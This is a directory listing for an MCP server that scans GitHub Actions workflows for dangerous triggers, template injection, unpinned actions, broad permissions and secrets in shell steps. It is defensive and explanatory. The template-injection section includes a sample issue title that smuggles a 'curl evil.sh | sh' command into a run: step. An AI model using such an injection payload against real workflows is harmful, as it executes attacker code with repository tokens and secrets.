actions-guard-mcp
Scans GitHub Actions workflow files for security risks such as dangerous triggers, template injection, unpinned actions and workflows, excessive permissions, and secrets interpolated into shell steps.
Click on "Install Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@actions-guard-mcpCheck this workflow for security issues before I commit it."
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
actions-guard-mcp
A GitHub Actions workflow security scanner, exposed as MCP tools — so an agent can catch the "pwn request" and supply-chain patterns that have caused real incidents (CoreShop, tj-actions, and others) before a workflow file is committed, not after.
Why this exists
Static analysis for GitHub Actions workflows is a mature, well-understood
field — zizmor is a respected,
actively maintained standalone scanner for exactly this. What doesn't
exist yet is a serious MCP wrapper around that class of analysis. The one
project found in a broad search (github-security-mcp) spreads 45 checks
across org settings, secrets, supply chain, and Actions in one generic
tool — 12 stars, no commits in 5 months. Nothing focuses on workflow
security specifically, deeply, as something an agent can call while it's
actively writing or reviewing a workflow file.
Related MCP server: vibecheck
What it catches
Dangerous triggers (AGMCP-101) —
pull_request_targetorworkflow_runcombined with a checkout step whoseref:orrepository:points at the triggering PR/run's own fork. This is the exact shape of the CoreShop incident: a workflow that runs with the base repo's token and secrets, but checks out and executes code from the fork that triggered it.Template injection (AGMCP-102) —
${{ ... }}expressions built from attacker-controlled context (github.event.issue.title,github.event.pull_request.title,github.event.comment.body,github.head_ref, atoJSON(github.event)whole-payload dump, and similar) interpolated directly into arun:step, rather than passed throughenv:. The classic shape isrun: echo "${{ github.event.issue.title }}"— an issue title of"; curl evil.sh | sh #is not a string at that point, it's shell.Unpinned actions and reusable workflows (AGMCP-103) —
uses: owner/repo@v4(a tag or branch, both mutable) instead of a pinned commit SHA; a job-level reusable-workflow call (jobs.<id>.uses: owner/repo/.github/workflows/x.yml@main) pinned the same mutable way; or adocker://image:tagreference not pinned to a@sha256:digest. This is the exact supply-chain surface the tj-actions incident used: a compromised tag pointed everyone using it at malicious code with no version bump.Excessive permissions (AGMCP-104) —
permissions: write-all, or explicit broadwritescopes (contents,actions,packages, ...), set at either the workflow level or a job level, on a workflow that also has a risky trigger, where a narrower scope would do.Secrets interpolated into shell (AGMCP-105) —
${{ secrets.X }}used directly in arun:step instead of passed throughenv:, which is unnecessary exposure of the raw secret value into the shell command line / process list rather than an environment variable.
All marker matching (AGMCP-101/102/105) normalizes GitHub Actions'
bracket-notation property access (github.event['issue']['title']) to
the equivalent dot form and matches case-insensitively, since the
expression language treats both as identical.
Known limitations
This is pattern matching over the literal text of ${{ }} expressions
and with:/permissions: blocks — not a full GitHub Actions expression
parser or a data-flow analysis. A clean scan means "no known risky
pattern found in the text as written," not a guarantee the workflow is
safe. Concretely:
No cross-step /
env:data-flow tracking. A dangerous value routed through an intermediateenv:variable or a step output before reaching a checkoutref:or arun:command is invisible to AGMCP-101/102/105 — only the literal expression in the field being checked is inspected.The attacker-controlled-context marker list (AGMCP-102) is a finite, hand-maintained set, not a real enumeration of every context path GitHub Actions exposes. A new or uncommon field can exist that isn't listed yet.
If a clean result matters for a security decision, don't treat it as the last word — zizmor does deeper, more general static analysis of the same file class and is worth running alongside this, not instead of it.
Setup
pip install actions-guard-mcp
actions-guard-mcpNo configuration needed — every tool takes a workflow file path or its raw YAML content directly.
Status
Early build.
License
MIT
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Related MCP Servers
- AlicenseAqualityDmaintenanceAn MCP server that enables AI agents to perform comprehensive GitHub security audits across org settings, repositories, Actions workflows, secrets, supply chain, and access control using 39 tools and 45 checks.3952112MIT
- AlicenseAqualityBmaintenanceAgent-native "safe to ship?" security gate for AI-generated code. Uses real parsers and inter-rocedural taint analysis (JS/TS, Python, Go) to flag the classes AI coding agents get wrong — secrets, SQL injection, SS, SSRF, path traversal, command injection, weak JWT/CORS — and ranks findings by confidence. Exposes a scan tool over MCP.162MIT
- AlicenseAqualityAmaintenanceLocal-only GitHub Actions and CI maintenance scanner for AI-built apps. Exposes scan, explanation, and fix-planning tools to MCP clients; modifies nothing and makes no outbound requests by default.3632MIT
- AlicenseAqualityBmaintenanceVerify-before-act safety tools for AI coding agents, providing MCP tools to check packages, lockfiles, manifests, and CI workflows for supply chain risks.449MIT
Related MCP Connectors
GitHub Actions workflow security audit - 21 checks: pinning, permissions, secrets, injection.
Scans MCP servers for tool poisoning, prompt injection and supply chain risks.
Screens public GitHub repos and PRs to generate risk maps, findings, and merge-readiness signals.
Latest Blog Posts
- Who's Calling? MCP Hosts Are an Identity Blind Spot (And the Spec Knows It)By Om-Shree-0709 on .mcpAgent IdentityOAuth 2.1
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/BerkantACUN/actions-guard-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server